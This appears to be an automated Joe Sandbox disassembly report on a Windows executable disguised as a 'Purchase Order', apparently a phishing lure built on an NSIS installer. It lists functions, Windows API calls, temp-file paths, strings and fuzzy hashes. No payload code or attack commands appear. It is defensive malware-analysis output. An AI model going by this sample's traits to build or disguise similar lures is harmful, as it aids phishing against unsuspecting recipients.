                                            • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                            • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                            • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8
                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                            Download Yara Rule
                                            APIs
                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                            • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                            • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                            • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                            Function 00405F06 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                            • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                              • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                              • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                            • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                            • wsprintfA.USER32 ref: 00405F85
                                            • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,?,004310E8,?,?,?,?,?), ref: 00405FC0
                                            • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405FCF
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                            • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                            • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                              • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                              • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                            • String ID: %ls=%ls$[Rename]
                                            • API String ID: 2171350718-461813615
                                            • Opcode ID: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                            • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                            • Opcode Fuzzy Hash: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                            • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD
                                            Function 0040654E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 004065B1
                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004065C0
                                            • CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 004065C5
                                            • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 004065D8
                                            Strings
                                            • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 0040654E
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040654F, 00406554
                                            • *?|<>/":, xrefs: 004065A0
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                            • API String ID: 589700163-1494957277
                                            • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                            • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                            • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                            • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                            Function 00404298 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                            • GetSysColor.USER32(00000000), ref: 004042F3
                                            • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                            • SetBkMode.GDI32(?,?), ref: 0040430B
                                            • GetSysColor.USER32(?), ref: 0040431E
                                            • SetBkColor.GDI32(?,?), ref: 0040432E
                                            • DeleteObject.GDI32(?), ref: 00404348
                                            • CreateBrushIndirect.GDI32(?), ref: 00404352
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                            • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                            • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                            Function 73CF2398 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF24DA
                                              • Part of subcall function 73CF122C: lstrcpynW.KERNEL32(00000000,?,73CF12DF,00000019,73CF11BE,-000000A0), ref: 73CF123C
                                            • GlobalAlloc.KERNEL32(?), ref: 73CF2460
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73CF247B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            • Associated: 00000005.00000002.1958280098.0000000073CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958325836.0000000073CF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958346292.0000000073CF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                            • String ID: @H3w
                                            • API String ID: 4216380887-4275297014
                                            • Opcode ID: 5453652426d6b521d33e7e901b9a17a3cc5d2dc3b1f01e584629d13dd2c96209
                                            • Instruction ID: 6ba2d198630259d7041cf0cca31701883a85dbf250c4cba476e72bb87aad0061
                                            • Opcode Fuzzy Hash: 5453652426d6b521d33e7e901b9a17a3cc5d2dc3b1f01e584629d13dd2c96209
                                            • Instruction Fuzzy Hash: 0D41C0BB00474BEFD394EF62D840B667BB8EB44310F11491EE54BCB581D771A889CB61
                                            Function 00405322 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                            • lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                            • lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,771B23A0), ref: 0040537D
                                            • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2531174081-0
                                            • Opcode ID: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                            • Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
                                            • Opcode Fuzzy Hash: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                            • Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8
                                            Function 00404BEC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                            • GetMessagePos.USER32 ref: 00404C0F
                                            • ScreenToClient.USER32(?,?), ref: 00404C29
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                            • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                            • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                            Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                            • MulDiv.KERNEL32(000B0B69,?,000B0D6D), ref: 00402E3C
                                            • wsprintfW.USER32 ref: 00402E4C
                                            • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402E46
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                            • Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
                                            • Opcode Fuzzy Hash: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                            • Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98
                                            Function 73CF256D Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 73CF121B: GlobalAlloc.KERNELBASE(?,?,73CF123B,?,73CF12DF,00000019,73CF11BE,-000000A0), ref: 73CF1225
                                            • GlobalFree.KERNEL32(?), ref: 73CF265B
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF2690
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            • Associated: 00000005.00000002.1958280098.0000000073CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958325836.0000000073CF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958346292.0000000073CF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: a9af553dfe7c8298344ede06740ec32321aa78ee8e7a3911caa0ad83f3d9503f
                                            • Instruction ID: c6553cb25a7f1bc838fc5cbbb4897dd26c31eaf426947891e14fda2cd85edd5e
                                            • Opcode Fuzzy Hash: a9af553dfe7c8298344ede06740ec32321aa78ee8e7a3911caa0ad83f3d9503f
                                            • Instruction Fuzzy Hash: 9731DE3710414BEFD796EF95C898F6ABBBAEB893047254529F186CB260C732AC049B15
                                            Function 004028DD Relevance: 9.1, APIs: 6, Instructions: 72memoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                              • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                            • GlobalAlloc.KERNEL32(?,?), ref: 00402901
                                            • CloseHandle.KERNEL32(?), ref: 00402981
                                              • Part of subcall function 00403347: SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,?,0000000A), ref: 00403355
                                            • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040291D
                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                              • Part of subcall function 00403116: GetTickCount.KERNEL32 ref: 00403180
                                              • Part of subcall function 00403116: GetTickCount.KERNEL32 ref: 00403227
                                              • Part of subcall function 00403116: MulDiv.KERNEL32(7FFFFFFF,?,00000000), ref: 00403250
                                              • Part of subcall function 00403116: wsprintfW.USER32 ref: 00403263
                                            • DeleteFileW.KERNEL32(?), ref: 00402995
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                            • String ID:
                                            • API String ID: 2082585436-0
                                            • Opcode ID: 2dfc98de5c867474921b5967b854fe25c23f3c723b305fca714a8a067162837a
                                            • Instruction ID: 261d92145e3bba679300767c23cfdc886404b76ac91639140900aca6c524774b
                                            • Opcode Fuzzy Hash: 2dfc98de5c867474921b5967b854fe25c23f3c723b305fca714a8a067162837a
                                            • Instruction Fuzzy Hash: 8B216DB1800118BBCF116FA5DE49CEE7E79EF08364F14413AF960762E0CB794D419B58
                                            Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp\System.dll,?,?,?,00000021), ref: 004025E8
                                            • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp\System.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp\System.dll,?,?,?,00000021), ref: 004025F3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWidelstrlen
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp$C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp\System.dll
                                            • API String ID: 3109718747-429556033
                                            • Opcode ID: 838fef82e08b076f5d49a30e748d8985297f415acc20a77e8e630ea48f411f47
                                            • Instruction ID: 4af4a56a495a7247eb1268c7c56f37f79310e300d8c273c1dd4748c0a8a00d57
                                            • Opcode Fuzzy Hash: 838fef82e08b076f5d49a30e748d8985297f415acc20a77e8e630ea48f411f47
